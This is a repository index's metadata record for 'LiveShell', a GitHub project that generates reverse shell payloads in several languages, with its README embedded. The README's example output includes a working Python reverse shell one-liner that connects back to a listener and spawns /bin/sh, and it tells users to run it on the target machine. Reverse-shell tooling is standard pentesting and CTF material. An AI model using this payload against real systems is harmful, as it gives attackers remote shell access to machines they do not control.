{"id":26411316,"url":"https://github.com/livepwn/liveshell","last_synced_at":"2025-03-17T20:33:13.788Z","repository":{"id":277894638,"uuid":"933842847","full_name":"livepwn/liveshell","owner":"livepwn","description":"LiveShell — Interactive Reverse Shell Generator","archived":false,"fork":false,"pushed_at":"2025-02-16T20:09:51.000Z","size":5,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-02-16T21:20:11.308Z","etag":null,"topics":["bugbounty","ctf-tools","hacking-tool","pentesting-tools","reverse-shell","security-tools"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/livepwn.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2025-02-16T20:09:08.000Z","updated_at":"2025-02-16T20:11:11.000Z","dependencies_parsed_at":"2025-02-16T21:30:18.709Z","dependency_job_id":null,"html_url":"https://github.com/livepwn/liveshell","commit_stats":null,"previous_names":["livepwn/liveshell"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/livepwn%2Fliveshell","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/livepwn%2Fliveshell/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/livepwn%2Fliveshell/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/livepwn%2Fliveshell/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/livepwn","download_url":"https://codeload.github.com/livepwn/liveshell/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":244105697,"owners_count":20398902,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["bugbounty","ctf-tools","hacking-tool","pentesting-tools","reverse-shell","security-tools"],"created_at":"2025-03-17T20:31:44.351Z","updated_at":"2025-03-17T20:33:13.782Z","avatar_url":"https://github.com/livepwn.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"\n# LiveShell - Interactive Reverse Shell Generator\n\n![LiveShell Banner](https://i.pinimg.com/736x/f5/b9/f0/f5b9f0bd95f86bf95ed21e8b1abf25d7.jpg)\n\n\n\n### LiveShell: \nIs a powerful, interactive tool designed to generate reverse shell payloads in multiple programming languages. Whether you're a penetration tester, security researcher, or ethical hacker, LiveShell simplifies the process of creating reverse shells for various platforms and architectures.\n\n---\n\n## Features\n\n- **Multi-Language Support**: Generate reverse shell payloads in Python, PHP, Bash, Netcat (nc), Perl, Ruby, Go, PowerShell, and JavaScript.\n- **Interactive Interface**: User-friendly menu-driven interface for easy navigation.\n- **Automated Listener**: Automatically starts a listener for the reverse shell connection.\n- **Colorful Output**: Beautiful, hacker-style terminal output with colors for better readability.\n- **Cross-Platform**: Works on Linux, macOS, and Windows (with WSL).\n\n\n\n## Installation\n\n1. Clone the repository:\n   ```bash\n   git clone https://github.com/livepwn/liveshell.git\n   \n   cd liveshell\n   \n   chmod +x liveshell.py\n   ```\n### Run the tool\n```bash\n./liveshell.py\n```\n# Usage\n### 1: Run the tool:\n\n```bash\n./liveshell.py\n```\n### 2: Follow the prompts:\n\n⚬Enter your IP address.\n\n⚬Enter the port to listen on.\n\n⚬Choose a language for the reverse shell payload.\n\n### 3: Copy the generated payload and execute it on the target machine.\n\n### 4: The tool will automatically start a listener. Once the payload is executed, you'll get a reverse shell connection.\n\n## Supported Languages\n  ●  Python\n\n  ●  PHP\n\n  ●  Bash\n\n  ●  Netcat (nc)\n\n  ●  Perl\n\n  ●  Ruby\n\n  ●  Go\n\n  ●  PowerShell\n\n  ●  JavaScript\n\n## Advantages\n### Fast and Efficient: \n  ▸  Generate reverse shell payloads in seconds.\n\n### No Manual Effort: \n  ▸  Automates the process of creating and testing reverse shells.\n\n### Beginner-Friendly: \n  ▸  Simple, interactive interface for users of all skill levels.\n\n### Extensible: \n▸ Easily add support for new languages or features.\n\n## Example\n```\n[*] Welcome to LiveShell - Interactive Reverse Shell Generator!\n[*] Please provide the following details:\n\n[+] Enter your IP address: 192.168.1.100\n[+] Enter the port to listen on (e.g., 4444): 4444\n\n[*] Available languages:\n1. Python\n2. PHP\n3. Bash\n4. Netcat (nc)\n5. Perl\n6. Ruby\n7. Go\n8. PowerShell\n9. JavaScript\n[+] Choose a language (1-9): 1\n\n[+] Reverse shell code for python:\n\npython3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.1.100\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"])'\n\n[*] Starting listener on port 4444...\n```\n\n## Author\n\n- [@livepwn](https://www.github.com/livepwn)\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Flivepwn%2Fliveshell","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Flivepwn%2Fliveshell","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Flivepwn%2Fliveshell/lists"}